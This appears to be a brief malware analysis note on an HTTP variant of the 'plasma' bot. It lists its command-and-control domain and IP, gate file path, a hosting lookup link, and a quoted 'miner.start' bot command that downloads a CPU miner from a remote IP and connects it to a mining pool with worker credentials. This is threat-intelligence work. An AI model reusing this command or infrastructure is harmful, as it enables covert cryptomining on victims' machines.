Resolved illuminati.sx to 126.96.36.199
Gate file: /http/gate.php
This is the first time I have seen the HTTP version of plasma and it sucks hard. It seems to be a slightly upgraded version of the old barracuda HTTP bot, with few of the problems fixed.
Hosting info: http://whois.domaintools.com/188.8.131.52
Bitcoin mining info:
miner.start http://184.108.40.206/miner/CPUMiner.files *-a scrypt -o stratum+tcp://pool.d2.cc:3335 -O avaster.x:x -t THREADS*
Related md5s (Download sample from Malwr.com)